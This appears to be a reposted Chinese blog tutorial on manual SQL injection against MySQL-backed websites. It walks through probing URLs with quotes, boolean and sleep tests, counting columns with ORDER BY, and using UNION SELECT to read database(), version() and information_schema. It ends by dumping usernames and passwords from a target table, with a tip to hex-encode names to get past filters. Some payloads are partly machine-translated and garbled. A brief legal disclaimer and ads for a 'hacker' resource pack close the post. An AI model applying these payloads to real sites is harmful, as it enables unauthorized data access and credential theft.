渗透测试之sql注入验证安全与攻击性能,sql注入检测

渗透测试之sql注入验证安全与攻击性能1、拿到网页后进行查找注入点;
1、通过单引号 ’ ; 在 url 后面输入单引号进行回车(如果报错可能存在sql注入为:10%左右)
2、利

1、拿到网页后进行查找注入点;

1. 使用单引号\’.在URL后面输入单引号并回车(如果报错可能是SQL注入:大约10%)

2.使用逻辑运算(在URL后输入,1=1是好的,1=2是坏的;SQL注入漏洞的概率约为40-60%)

3.使用休眠功能,俗称钓鱼功能(在URL后输入sleep(10),会导致网页休眠10秒。休眠与网速有关,因此SQL注入漏洞出现这种情况的概率约为50%)。

4.使用计算进行测试(例如:id=1可以改为id=2-1或3-2,可以通过计算来完成,SQL注入漏洞的概率约为95-100%)

2、进行测试报字段通过(order by函数);我的字段是9

在URL后添加按XXX(整数)排序,并多次使用XXX来查找重要值(报错和不报错的界限)。

3、通过寻找到的字段后进行联合查询;

URL+联合选择

1,2,3,4,5,6,7,8,9(显示字段序号对应的位置,一般第一个数字为序号,后面的数字为字段序号) 1 不应该可以更改,因为它只占据位置(可以重新定位)

4、查询数据库名;

URL+联合选择

1,2,database(),4,5,6,7,8,9(database(),占用的位置当然可以改,只要不占用1就没有问题)

5、查询数据库版本号;

URL + 联合选择1,2,3,4,version(),6,7,8,9

(version(),占用的位置当然可以改变,但是只要不占用1就没有问题)

查询数据库版本的目的是当mysql版本大于5.0时,必然会出现默认的库信息如:

我通常使用的默认库是:information_schema

6、查询数据库中的表名;

URL + 联合选择1,2,3,4,group_concat(表名),6,7,8,9,from

information_schema.tables 其中table_schema=database()可以找到所有表的表名。

7、直接爆出表中用户;

URL + 联合选择1,2,3,4,group_concat(column_name),6,7,8,9,from

information_schema.columns 其中table_name=‘表名’

注意: 开发人员非常聪明,可能会使用特殊字符来过滤他们的代码,因此您应该在输入查询之前将“表名称”转换为十六进制或其他值。

8、查看表中所有信息内容;

URL + Union select 1,2,3,4,group_concat(usename,0x7e,password),6,7,8,9,来自表名

获取每个用户的具体信息

PS:这里不再详细介绍如何破解后端URL并登录(注意,你可能必须尝试解密密码)。

提倡网络安全,不要徘徊法律界限,不要随意攻击他人网站。

网络安全成长路线图

早期朝这个方向起步相对容易。一旦掌握了一些基本技术,您就可以获取各种现成的工具并开始黑客攻击。然而,如果你想从一个脚本小子变成一个黑客高手,越往这个方向走,你就越需要学习和掌握。这是学习网络安全所需的方向。

上面介绍了技术分类和学习路线有几种学习方法。

无论您访问Bilibili 还是YouTube,都有大量与网络安全相关的视频可供您学习。当然,如果您不确定选择哪个,我们还整理了一系列链接视频教程。如果您有兴趣开始网络安全,请单击此处以获得网络安全的巨大好处。免费提供完整的入门级和高级共享的282G学习资源包。

如果你对网络安全入门感兴趣,那么你点击这里CSDN大礼包:《黑客网络安全入门进阶学习资源包》免费分享

# 以上关于SQL注入验证安全和渗透测试攻击性能的内容摘自网络,供大家参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91957.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月24日 上午10:38
下一篇 2024年6月24日 上午10:56

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注